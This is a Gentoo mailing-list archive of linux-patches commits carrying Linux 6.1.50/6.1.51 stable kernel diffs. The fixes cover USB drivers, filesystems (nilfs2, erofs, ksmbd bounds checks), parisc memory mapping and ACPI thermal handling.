+-		if (data->dc_vol_level_adjust && data->dc_vol_level_adjust <=
++		if (data->dc_vol_level_adjust >= 0 &&
++			data->dc_vol_level_adjust <=
+ 			(TXVREFTUNE0_MASK >> TXVREFTUNE0_BIT)) {
+ 			reg &= ~TXVREFTUNE0_MASK;
+ 			reg |= (data->dc_vol_level_adjust << TXVREFTUNE0_BIT);
+diff --git a/drivers/usb/dwc3/dwc3-meson-g12a.c b/drivers/usb/dwc3/dwc3-meson-g12a.c
+index eaea944ebd2ce..10298b91731eb 100644
+--- a/drivers/usb/dwc3/dwc3-meson-g12a.c
++++ b/drivers/usb/dwc3/dwc3-meson-g12a.c
+@@ -938,6 +938,12 @@ static int __maybe_unused dwc3_meson_g12a_resume(struct device *dev)
+ 			return ret;
+ 	}
+ 
++	if (priv->drvdata->usb_post_init) {
++		ret = priv->drvdata->usb_post_init(priv);
++		if (ret)
++			return ret;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 119641761c3b4..f13930b4534c1 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -259,6 +259,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EM05G			0x030a
+ #define QUECTEL_PRODUCT_EM060K			0x030b
+ #define QUECTEL_PRODUCT_EM05G_CS		0x030c
++#define QUECTEL_PRODUCT_EM05GV2			0x030e
+ #define QUECTEL_PRODUCT_EM05CN_SG		0x0310
+ #define QUECTEL_PRODUCT_EM05G_SG		0x0311
+ #define QUECTEL_PRODUCT_EM05CN			0x0312
+@@ -1190,6 +1191,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_GR, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05GV2, 0xff),
++	  .driver_info = RSVD(4) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_CS, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_RS, 0xff),
+@@ -2232,6 +2235,10 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(0) | RSVD(1) | RSVD(6) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0db, 0xff),			/* Foxconn T99W265 MBIM */
+ 	  .driver_info = RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0ee, 0xff),			/* Foxconn T99W368 MBIM */
++	  .driver_info = RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0f0, 0xff),			/* Foxconn T99W373 MBIM */
++	  .driver_info = RSVD(3) },
+ 	{ USB_DEVICE(0x1508, 0x1001),						/* Fibocom NL668 (IOT version) */
+ 	  .driver_info = RSVD(4) | RSVD(5) | RSVD(6) },
+ 	{ USB_DEVICE(0x1782, 0x4d10) },						/* Fibocom L610 (AT mode) */
+diff --git a/drivers/usb/typec/tcpm/tcpci.c b/drivers/usb/typec/tcpm/tcpci.c
+index 72f8d1e876004..816945913ed0d 100644
+--- a/drivers/usb/typec/tcpm/tcpci.c
++++ b/drivers/usb/typec/tcpm/tcpci.c
+@@ -593,6 +593,10 @@ static int tcpci_init(struct tcpc_dev *tcpc)
+ 	if (time_after(jiffies, timeout))
+ 		return -ETIMEDOUT;
+ 
++	ret = tcpci_write16(tcpci, TCPC_FAULT_STATUS, TCPC_FAULT_STATUS_ALL_REG_RST_TO_DEFAULT);
++	if (ret < 0)
++		return ret;
++
+ 	/* Handle vendor init */
+ 	if (tcpci->data->init) {
+ 		ret = tcpci->data->init(tcpci, tcpci->data);
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index d5950ef9d1f35..5f45b82dd1914 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -2747,6 +2747,13 @@ static void tcpm_pd_ctrl_request(struct tcpm_port *port,
+ 			port->sink_cap_done = true;
+ 			tcpm_set_state(port, ready_state(port), 0);
+ 			break;
++		/*
++		 * Some port partners do not support GET_STATUS, avoid soft reset the link to
++		 * prevent redundant power re-negotiation
++		 */
++		case GET_STATUS_SEND:
++			tcpm_set_state(port, ready_state(port), 0);
++			break;
+ 		case SRC_READY:
+ 		case SNK_READY:
+ 			if (port->vdm_state > VDM_STATE_READY) {
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 361f3c29897e8..1b91ac5be9610 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -869,6 +869,8 @@ hitted:
+ 	cur = end - min_t(erofs_off_t, offset + end - map->m_la, end);
+ 	if (!(map->m_flags & EROFS_MAP_MAPPED)) {
+ 		zero_user_segment(page, cur, end);
++		++spiltted;
++		tight = false;
+ 		goto next_part;
+ 	}
+ 	if (map->m_flags & EROFS_MAP_FRAGMENT) {
+diff --git a/fs/nilfs2/alloc.c b/fs/nilfs2/alloc.c
+index 6ce8617b562d5..7342de296ec3c 100644
+--- a/fs/nilfs2/alloc.c
++++ b/fs/nilfs2/alloc.c
+@@ -205,7 +205,8 @@ static int nilfs_palloc_get_block(struct inode *inode, unsigned long blkoff,
+ 	int ret;
+ 
+ 	spin_lock(lock);
+-	if (prev->bh && blkoff == prev->blkoff) {
++	if (prev->bh && blkoff == prev->blkoff &&
++	    likely(buffer_uptodate(prev->bh))) {
+ 		get_bh(prev->bh);
+ 		*bhp = prev->bh;
+ 		spin_unlock(lock);
+diff --git a/fs/nilfs2/inode.c b/fs/nilfs2/inode.c
+index d4c0895a88116..f625872321cca 100644
+--- a/fs/nilfs2/inode.c
++++ b/fs/nilfs2/inode.c
+@@ -1025,7 +1025,7 @@ int nilfs_load_inode_block(struct inode *inode, struct buffer_head **pbh)
+ 	int err;
+ 
+ 	spin_lock(&nilfs->ns_inode_lock);
+-	if (ii->i_bh == NULL) {
++	if (ii->i_bh == NULL || unlikely(!buffer_uptodate(ii->i_bh))) {
+ 		spin_unlock(&nilfs->ns_inode_lock);
+ 		err = nilfs_ifile_get_inode_block(ii->i_root->ifile,
+ 						  inode->i_ino, pbh);
+@@ -1034,7 +1034,10 @@ int nilfs_load_inode_block(struct inode *inode, struct buffer_head **pbh)
+ 		spin_lock(&nilfs->ns_inode_lock);
+ 		if (ii->i_bh == NULL)
+ 			ii->i_bh = *pbh;
+-		else {
++		else if (unlikely(!buffer_uptodate(ii->i_bh))) {
++			__brelse(ii->i_bh);
++			ii->i_bh = *pbh;
++		} else {
+ 			brelse(*pbh);
+ 			*pbh = ii->i_bh;
+ 		}
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 21e8260112c8f..a4a147a983e0a 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -725,6 +725,11 @@ static size_t nilfs_lookup_dirty_data_buffers(struct inode *inode,
+ 		struct page *page = pvec.pages[i];
+ 
+ 		lock_page(page);
++		if (unlikely(page->mapping != mapping)) {
++			/* Exclude pages removed from the address space */
++			unlock_page(page);
++			continue;
++		}
+ 		if (!page_has_buffers(page))
+ 			create_empty_buffers(page, i_blocksize(inode), 0);
+ 		unlock_page(page);
+diff --git a/fs/smb/server/auth.c b/fs/smb/server/auth.c
+index 5e5e120edcc22..15e5684e328c1 100644
+--- a/fs/smb/server/auth.c
++++ b/fs/smb/server/auth.c
+@@ -355,6 +355,9 @@ int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
+ 		if (blob_len < (u64)sess_key_off + sess_key_len)
+ 			return -EINVAL;
+ 
++		if (sess_key_len > CIFS_KEY_SIZE)
++			return -EINVAL;
++
+ 		ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
+ 		if (!ctx_arc4)
+ 			return -ENOMEM;
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index 4b210cdd75569..c81aee9ce7ec4 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -1492,7 +1492,7 @@ struct create_context *smb2_find_context_vals(void *open_req, const char *tag, i
+ 		    name_len < 4 ||
+ 		    name_off + name_len > cc_len ||
+ 		    (value_off & 0x7) != 0 ||
+-		    (value_off && (value_off < name_off + name_len)) ||
++		    (value_len && value_off < name_off + (name_len < 8 ? 8 : name_len)) ||
+ 		    ((u64)value_off + value_len > cc_len))
+ 			return ERR_PTR(-EINVAL);
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index f8ca44622d909..9b621fd993bb7 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -4322,7 +4322,7 @@ static int smb2_get_ea(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
+ 			name_len -= XATTR_USER_PREFIX_LEN;
+ 
+-		ptr = (char *)(&eainfo->name + name_len + 1);
++		ptr = eainfo->name + name_len + 1;
+ 		buf_free_len -= (offsetof(struct smb2_ea_info, name) +
+ 				name_len + 1);
+ 		/* bailout if xattr can't fit in buf_free_len */
+diff --git a/fs/smb/server/smb2pdu.h b/fs/smb/server/smb2pdu.h
+index dd10f8031606b..665a837378540 100644
+--- a/fs/smb/server/smb2pdu.h
++++ b/fs/smb/server/smb2pdu.h
+@@ -410,7 +410,7 @@ struct smb2_ea_info {
+ 	__u8   Flags;
+ 	__u8   EaNameLength;
+ 	__le16 EaValueLength;
+-	char name[1];
++	char name[];
+ 	/* optionally followed by value */
+ } __packed; /* level 15 Query */
+ 
+diff --git a/fs/smb/server/transport_rdma.c b/fs/smb/server/transport_rdma.c
+index c06efc020bd95..7578200f63b1d 100644
+--- a/fs/smb/server/transport_rdma.c
++++ b/fs/smb/server/transport_rdma.c
+@@ -1366,24 +1366,35 @@ static int smb_direct_rdma_xmit(struct smb_direct_transport *t,
+ 	LIST_HEAD(msg_list);
+ 	char *desc_buf;
+ 	int credits_needed;
+-	unsigned int desc_buf_len;
+-	size_t total_length = 0;
++	unsigned int desc_buf_len, desc_num = 0;
+ 
+ 	if (t->status != SMB_DIRECT_CS_CONNECTED)
+ 		return -ENOTCONN;
+ 
++	if (buf_len > t->max_rdma_rw_size)
++		return -EINVAL;
++
+ 	/* calculate needed credits */
+ 	credits_needed = 0;
+ 	desc_buf = buf;
+ 	for (i = 0; i < desc_len / sizeof(*desc); i++) {
++		if (!buf_len)
++			break;
++
+ 		desc_buf_len = le32_to_cpu(desc[i].length);
++		if (!desc_buf_len)
++			return -EINVAL;
++
++		if (desc_buf_len > buf_len) {
++			desc_buf_len = buf_len;
++			desc[i].length = cpu_to_le32(desc_buf_len);
++			buf_len = 0;
++		}
+ 
+ 		credits_needed += calc_rw_credits(t, desc_buf, desc_buf_len);
+ 		desc_buf += desc_buf_len;
+-		total_length += desc_buf_len;
+-		if (desc_buf_len == 0 || total_length > buf_len ||
+-		    total_length > t->max_rdma_rw_size)
+-			return -EINVAL;
++		buf_len -= desc_buf_len;
++		desc_num++;
+ 	}
+ 
+ 	ksmbd_debug(RDMA, "RDMA %s, len %#x, needed credits %#x\n",
+@@ -1395,7 +1406,7 @@ static int smb_direct_rdma_xmit(struct smb_direct_transport *t,
+ 
+ 	/* build rdma_rw_ctx for each descriptor */
+ 	desc_buf = buf;
+-	for (i = 0; i < desc_len / sizeof(*desc); i++) {
++	for (i = 0; i < desc_num; i++) {
+ 		msg = kzalloc(offsetof(struct smb_direct_rdma_rw_msg, sg_list) +
+ 			      sizeof(struct scatterlist) * SG_CHUNK_SIZE, GFP_KERNEL);
+ 		if (!msg) {
+diff --git a/include/linux/usb/tcpci.h b/include/linux/usb/tcpci.h
+index 17657451c762c..77eb40b918d7d 100644
+--- a/include/linux/usb/tcpci.h
++++ b/include/linux/usb/tcpci.h
+@@ -103,6 +103,7 @@
+ #define TCPC_POWER_STATUS_SINKING_VBUS	BIT(0)
+ 
+ #define TCPC_FAULT_STATUS		0x1f
++#define TCPC_FAULT_STATUS_ALL_REG_RST_TO_DEFAULT BIT(7)
+ 
+ #define TCPC_ALERT_EXTENDED		0x21
+ 
+diff --git a/kernel/module/main.c b/kernel/module/main.c
+index 7a6f43d2b7757..7a376e26de85b 100644
+--- a/kernel/module/main.c
++++ b/kernel/module/main.c
+@@ -1214,12 +1214,20 @@ void *__symbol_get(const char *symbol)
+ 	};
+ 
+ 	preempt_disable();
+-	if (!find_symbol(&fsa) || strong_try_module_get(fsa.owner)) {
+-		preempt_enable();
+-		return NULL;
++	if (!find_symbol(&fsa))
++		goto fail;
++	if (fsa.license != GPL_ONLY) {
++		pr_warn("failing symbol_get of non-GPLONLY symbol %s.\n",
++			symbol);
++		goto fail;
+ 	}
++	if (strong_try_module_get(fsa.owner))
++		goto fail;
+ 	preempt_enable();
+ 	return (void *)kernel_symbol_value(fsa.sym);
++fail:
++	preempt_enable();
++	return NULL;
+ }
+ EXPORT_SYMBOL_GPL(__symbol_get);
+ 
+diff --git a/sound/usb/stream.c b/sound/usb/stream.c
+index f10f4e6d3fb85..3d4add94e367d 100644
+--- a/sound/usb/stream.c
++++ b/sound/usb/stream.c
+@@ -1093,6 +1093,7 @@ static int __snd_usb_parse_audio_interface(struct snd_usb_audio *chip,
+ 	int i, altno, err, stream;
+ 	struct audioformat *fp = NULL;
+ 	struct snd_usb_power_domain *pd = NULL;
++	bool set_iface_first;
+ 	int num, protocol;
+ 
+ 	dev = chip->dev;
+@@ -1223,11 +1224,19 @@ static int __snd_usb_parse_audio_interface(struct snd_usb_audio *chip,
+ 				return err;
+ 		}
+ 
++		set_iface_first = false;
++		if (protocol == UAC_VERSION_1 ||
++		    (chip->quirk_flags & QUIRK_FLAG_SET_IFACE_FIRST))
++			set_iface_first = true;
++
+ 		/* try to set the interface... */
+ 		usb_set_interface(chip->dev, iface_no, 0);
++		if (set_iface_first)
++			usb_set_interface(chip->dev, iface_no, altno);
+ 		snd_usb_init_pitch(chip, fp);
+ 		snd_usb_init_sample_rate(chip, fp, fp->rate_max);
+-		usb_set_interface(chip->dev, iface_no, altno);
++		if (!set_iface_first)
++			usb_set_interface(chip->dev, iface_no, altno);
+ 	}
+ 	return 0;
+ }


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-02  9:56 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-02  9:56 UTC (permalink / raw
  To: gentoo-commits

commit:     0fc743e4891da8f3fb4d6255a2dbdde81b184016
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Sep  2 09:56:29 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Sep  2 09:56:29 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0fc743e4

Linux patch 6.1.51

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1050_linux-6.1.51.patch | 550 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 554 insertions(+)

diff --git a/0000_README b/0000_README
index 870654fc..641d98d3 100644
--- a/0000_README
+++ b/0000_README
@@ -243,6 +243,10 @@ Patch:  1049_linux-6.1.50.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.50
 
+Patch:  1050_linux-6.1.51.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.51
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1050_linux-6.1.51.patch b/1050_linux-6.1.51.patch
new file mode 100644
index 00000000..1b1e4e60
--- /dev/null
+++ b/1050_linux-6.1.51.patch
@@ -0,0 +1,550 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 882b6198dd0d1..31af352b4762d 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -6164,10 +6164,6 @@
+ 			-1: disable all critical trip points in all thermal zones
+ 			<degrees C>: override all critical trip points
+ 
+-	thermal.nocrt=	[HW,ACPI]
+-			Set to disable actions on ACPI thermal zone
+-			critical and hot trip points.
+-
+ 	thermal.off=	[HW,ACPI]
+ 			1: disable ACPI thermal control
+ 
+diff --git a/Makefile b/Makefile
+index e5e1fdeef8bf0..e7c344d5af156 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 50
++SUBLEVEL = 51
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/kernel/module-plts.c b/arch/arm/kernel/module-plts.c
+index 1fc309b41f944..8d809724cde52 100644
+--- a/arch/arm/kernel/module-plts.c
++++ b/arch/arm/kernel/module-plts.c
+@@ -256,7 +256,7 @@ int module_frob_arch_sections(Elf_Ehdr *ehdr, Elf_Shdr *sechdrs,
+ 		/* sort by type and symbol index */
+ 		sort(rels, numrels, sizeof(Elf32_Rel), cmp_rel, NULL);
+ 
+-		if (strncmp(secstrings + dstsec->sh_name, ".init", 5) != 0)
++		if (!module_init_layout_section(secstrings + dstsec->sh_name))
+ 			core_plts += count_plts(syms, dstsec->sh_addr, rels,
+ 						numrels, s->sh_info);
+ 		else
+diff --git a/arch/arm64/kernel/module-plts.c b/arch/arm64/kernel/module-plts.c
+index 5a0a8f552a610..c703b5db8eb11 100644
+--- a/arch/arm64/kernel/module-plts.c
++++ b/arch/arm64/kernel/module-plts.c
+@@ -7,6 +7,7 @@
+ #include <linux/ftrace.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
++#include <linux/moduleloader.h>
+ #include <linux/sort.h>
+ 
+ static struct plt_entry __get_adrp_add_pair(u64 dst, u64 pc,
+@@ -343,7 +344,7 @@ int module_frob_arch_sections(Elf_Ehdr *ehdr, Elf_Shdr *sechdrs,
+ 		if (nents)
+ 			sort(rels, nents, sizeof(Elf64_Rela), cmp_rela, NULL);
+ 
+-		if (!str_has_prefix(secstrings + dstsec->sh_name, ".init"))
++		if (!module_init_layout_section(secstrings + dstsec->sh_name))
+ 			core_plts += count_plts(syms, rels, numrels,
+ 						sechdrs[i].sh_info, dstsec);
+ 		else
+diff --git a/arch/parisc/kernel/sys_parisc.c b/arch/parisc/kernel/sys_parisc.c
+index 09a34b07f02e6..9915062d5243c 100644
+--- a/arch/parisc/kernel/sys_parisc.c
++++ b/arch/parisc/kernel/sys_parisc.c
+@@ -24,32 +24,28 @@
+ #include <linux/personality.h>
+ #include <linux/random.h>
+ #include <linux/compat.h>
++#include <linux/elf-randomize.h>
+ 
+-/* we construct an artificial offset for the mapping based on the physical
+- * address of the kernel mapping variable */
+-#define GET_LAST_MMAP(filp)		\
+-	(filp ? ((unsigned long) filp->f_mapping) >> 8 : 0UL)
+-#define SET_LAST_MMAP(filp, val)	\
+-	 { /* nothing */ }
+-
+-static int get_offset(unsigned int last_mmap)
+-{
+-	return (last_mmap & (SHM_COLOUR-1)) >> PAGE_SHIFT;
+-}
++/*
++ * Construct an artificial page offset for the mapping based on the physical
++ * address of the kernel file mapping variable.
++ */
++#define GET_FILP_PGOFF(filp)		\
++	(filp ? (((unsigned long) filp->f_mapping) >> 8)	\
++		 & ((SHM_COLOUR-1) >> PAGE_SHIFT) : 0UL)
+ 
+-static unsigned long shared_align_offset(unsigned int last_mmap,
++static unsigned long shared_align_offset(unsigned long filp_pgoff,
+ 					 unsigned long pgoff)
+ {
+-	return (get_offset(last_mmap) + pgoff) << PAGE_SHIFT;
++	return (filp_pgoff + pgoff) << PAGE_SHIFT;
+ }
+ 
+ static inline unsigned long COLOR_ALIGN(unsigned long addr,
+-			 unsigned int last_mmap, unsigned long pgoff)
++			 unsigned long filp_pgoff, unsigned long pgoff)
+ {
+ 	unsigned long base = (addr+SHM_COLOUR-1) & ~(SHM_COLOUR-1);
+ 	unsigned long off  = (SHM_COLOUR-1) &
+-		(shared_align_offset(last_mmap, pgoff) << PAGE_SHIFT);
+-
++		shared_align_offset(filp_pgoff, pgoff);
+ 	return base + off;
+ }
+ 
+@@ -98,126 +94,91 @@ static unsigned long mmap_upper_limit(struct rlimit *rlim_stack)
+ 	return PAGE_ALIGN(STACK_TOP - stack_base);
+ }
+ 
++enum mmap_allocation_direction {UP, DOWN};
+ 
+-unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
+-		unsigned long len, unsigned long pgoff, unsigned long flags)
++static unsigned long arch_get_unmapped_area_common(struct file *filp,
++	unsigned long addr, unsigned long len, unsigned long pgoff,
++	unsigned long flags, enum mmap_allocation_direction dir)
+ {
+ 	struct mm_struct *mm = current->mm;
+ 	struct vm_area_struct *vma, *prev;
+-	unsigned long task_size = TASK_SIZE;
+-	int do_color_align, last_mmap;
++	unsigned long filp_pgoff;
++	int do_color_align;
+ 	struct vm_unmapped_area_info info;
+ 
+-	if (len > task_size)
++	if (unlikely(len > TASK_SIZE))
+ 		return -ENOMEM;
+ 
+ 	do_color_align = 0;
+ 	if (filp || (flags & MAP_SHARED))
+ 		do_color_align = 1;
+-	last_mmap = GET_LAST_MMAP(filp);
++	filp_pgoff = GET_FILP_PGOFF(filp);
+ 
+ 	if (flags & MAP_FIXED) {
+-		if ((flags & MAP_SHARED) && last_mmap &&
+-		    (addr - shared_align_offset(last_mmap, pgoff))
++		/* Even MAP_FIXED mappings must reside within TASK_SIZE */
++		if (TASK_SIZE - len < addr)
++			return -EINVAL;
++
++		if ((flags & MAP_SHARED) && filp &&
++		    (addr - shared_align_offset(filp_pgoff, pgoff))
+ 				& (SHM_COLOUR - 1))
+ 			return -EINVAL;
+-		goto found_addr;
++		return addr;
+ 	}
+ 
+ 	if (addr) {
+-		if (do_color_align && last_mmap)
+-			addr = COLOR_ALIGN(addr, last_mmap, pgoff);
++		if (do_color_align)
++			addr = COLOR_ALIGN(addr, filp_pgoff, pgoff);
+ 		else
+ 			addr = PAGE_ALIGN(addr);
+ 
+ 		vma = find_vma_prev(mm, addr, &prev);
+-		if (task_size - len >= addr &&
++		if (TASK_SIZE - len >= addr &&
+ 		    (!vma || addr + len <= vm_start_gap(vma)) &&
+ 		    (!prev || addr >= vm_end_gap(prev)))
+-			goto found_addr;
++			return addr;
+ 	}
+ 
+-	info.flags = 0;
+ 	info.length = len;
++	info.align_mask = do_color_align ? (PAGE_MASK & (SHM_COLOUR - 1)) : 0;
++	info.align_offset = shared_align_offset(filp_pgoff, pgoff);
++
++	if (dir == DOWN) {
++		info.flags = VM_UNMAPPED_AREA_TOPDOWN;
++		info.low_limit = PAGE_SIZE;
++		info.high_limit = mm->mmap_base;
++		addr = vm_unmapped_area(&info);
++		if (!(addr & ~PAGE_MASK))
++			return addr;
++		VM_BUG_ON(addr != -ENOMEM);
++
++		/*
++		 * A failed mmap() very likely causes application failure,
++		 * so fall back to the bottom-up function here. This scenario
++		 * can happen with large stack limits and large mmap()
++		 * allocations.
++		 */
++	}
++
++	info.flags = 0;
+ 	info.low_limit = mm->mmap_legacy_base;
+ 	info.high_limit = mmap_upper_limit(NULL);
+-	info.align_mask = last_mmap ? (PAGE_MASK & (SHM_COLOUR - 1)) : 0;
+-	info.align_offset = shared_align_offset(last_mmap, pgoff);
+-	addr = vm_unmapped_area(&info);
+-
+-found_addr:
+-	if (do_color_align && !last_mmap && !(addr & ~PAGE_MASK))
+-		SET_LAST_MMAP(filp, addr - (pgoff << PAGE_SHIFT));
+-
+-	return addr;
++	return vm_unmapped_area(&info);
+ }
+ 
+-unsigned long
+-arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
+-			  const unsigned long len, const unsigned long pgoff,
+-			  const unsigned long flags)
++unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
++	unsigned long len, unsigned long pgoff, unsigned long flags)
+ {
+-	struct vm_area_struct *vma, *prev;
+-	struct mm_struct *mm = current->mm;
+-	unsigned long addr = addr0;
+-	int do_color_align, last_mmap;
+-	struct vm_unmapped_area_info info;
+-
+-	/* requested length too big for entire address space */
+-	if (len > TASK_SIZE)
+-		return -ENOMEM;
+-
+-	do_color_align = 0;
+-	if (filp || (flags & MAP_SHARED))
+-		do_color_align = 1;
+-	last_mmap = GET_LAST_MMAP(filp);
+-
+-	if (flags & MAP_FIXED) {
+-		if ((flags & MAP_SHARED) && last_mmap &&
+-		    (addr - shared_align_offset(last_mmap, pgoff))
+-			& (SHM_COLOUR - 1))
+-			return -EINVAL;
+-		goto found_addr;
+-	}
+-
+-	/* requesting a specific address */
+-	if (addr) {
+-		if (do_color_align && last_mmap)
+-			addr = COLOR_ALIGN(addr, last_mmap, pgoff);
+-		else
+-			addr = PAGE_ALIGN(addr);
+-
+-		vma = find_vma_prev(mm, addr, &prev);
+-		if (TASK_SIZE - len >= addr &&
+-		    (!vma || addr + len <= vm_start_gap(vma)) &&
+-		    (!prev || addr >= vm_end_gap(prev)))
+-			goto found_addr;
+-	}
+-
+-	info.flags = VM_UNMAPPED_AREA_TOPDOWN;
+-	info.length = len;
+-	info.low_limit = PAGE_SIZE;
+-	info.high_limit = mm->mmap_base;
+-	info.align_mask = last_mmap ? (PAGE_MASK & (SHM_COLOUR - 1)) : 0;
+-	info.align_offset = shared_align_offset(last_mmap, pgoff);
+-	addr = vm_unmapped_area(&info);
+-	if (!(addr & ~PAGE_MASK))
+-		goto found_addr;
+-	VM_BUG_ON(addr != -ENOMEM);
+-
+-	/*
+-	 * A failed mmap() very likely causes application failure,
+-	 * so fall back to the bottom-up function here. This scenario
+-	 * can happen with large stack limits and large mmap()
+-	 * allocations.
+-	 */
+-	return arch_get_unmapped_area(filp, addr0, len, pgoff, flags);
+-
+-found_addr:
+-	if (do_color_align && !last_mmap && !(addr & ~PAGE_MASK))
+-		SET_LAST_MMAP(filp, addr - (pgoff << PAGE_SHIFT));
++	return arch_get_unmapped_area_common(filp,
++			addr, len, pgoff, flags, UP);
++}
+ 
+-	return addr;
++unsigned long arch_get_unmapped_area_topdown(struct file *filp,
++	unsigned long addr, unsigned long len, unsigned long pgoff,
++	unsigned long flags)
++{
++	return arch_get_unmapped_area_common(filp,
++			addr, len, pgoff, flags, DOWN);
+ }
+ 
+ static int mmap_is_legacy(void)
+@@ -379,7 +340,7 @@ asmlinkage long parisc_fallocate(int fd, int mode, u32 offhi, u32 offlo,
+ 			      ((u64)lenhi << 32) | lenlo);
+ }
+ 
+-long parisc_personality(unsigned long personality)
++asmlinkage long parisc_personality(unsigned long personality)
+ {
+ 	long err;
+ 
+diff --git a/arch/x86/include/asm/sections.h b/arch/x86/include/asm/sections.h
+index a6e8373a5170f..3fa87e5e11aba 100644
+--- a/arch/x86/include/asm/sections.h
++++ b/arch/x86/include/asm/sections.h
+@@ -2,8 +2,6 @@
+ #ifndef _ASM_X86_SECTIONS_H
+ #define _ASM_X86_SECTIONS_H
+ 
+-#define arch_is_kernel_initmem_freed arch_is_kernel_initmem_freed
+-
+ #include <asm-generic/sections.h>
+ #include <asm/extable.h>
+ 
+@@ -18,20 +16,4 @@ extern char __end_of_kernel_reserve[];
+ 
+ extern unsigned long _brk_start, _brk_end;
+ 
+-static inline bool arch_is_kernel_initmem_freed(unsigned long addr)
+-{
+-	/*
+-	 * If _brk_start has not been cleared, brk allocation is incomplete,
+-	 * and we can not make assumptions about its use.
+-	 */
+-	if (_brk_start)
+-		return 0;
+-
+-	/*
+-	 * After brk allocation is complete, space between _brk_end and _end
+-	 * is available for allocation.
+-	 */
+-	return addr >= _brk_end && addr < (unsigned long)&_end;
+-}
+-
+ #endif	/* _ASM_X86_SECTIONS_H */
+diff --git a/drivers/acpi/thermal.c b/drivers/acpi/thermal.c
+index 40b07057983e0..40ecb55b52f8c 100644
+--- a/drivers/acpi/thermal.c
++++ b/drivers/acpi/thermal.c
+@@ -59,10 +59,6 @@ static int tzp;
+ module_param(tzp, int, 0444);
+ MODULE_PARM_DESC(tzp, "Thermal zone polling frequency, in 1/10 seconds.");
+ 
+-static int nocrt;
+-module_param(nocrt, int, 0);
+-MODULE_PARM_DESC(nocrt, "Set to take no action upon ACPI thermal zone critical trips points.");
+-
+ static int off;
+ module_param(off, int, 0);
+ MODULE_PARM_DESC(off, "Set to disable ACPI thermal support.");
+@@ -1128,7 +1124,7 @@ static int thermal_act(const struct dmi_system_id *d) {
+ static int thermal_nocrt(const struct dmi_system_id *d) {
+ 	pr_notice("%s detected: disabling all critical thermal trip point actions.\n",
+ 		  d->ident);
+-	nocrt = 1;
++	crt = -1;
+ 	return 0;
+ }
+ static int thermal_tzp(const struct dmi_system_id *d) {
+diff --git a/drivers/thunderbolt/tmu.c b/drivers/thunderbolt/tmu.c
+index d9544600b3867..49146f97bb16e 100644
+--- a/drivers/thunderbolt/tmu.c
++++ b/drivers/thunderbolt/tmu.c
+@@ -416,6 +416,7 @@ int tb_switch_tmu_disable(struct tb_switch *sw)
+ 		 * mode.
+ 		 */
+ 		ret = tb_switch_tmu_rate_write(sw, TB_SWITCH_TMU_RATE_OFF);
++		if (ret)
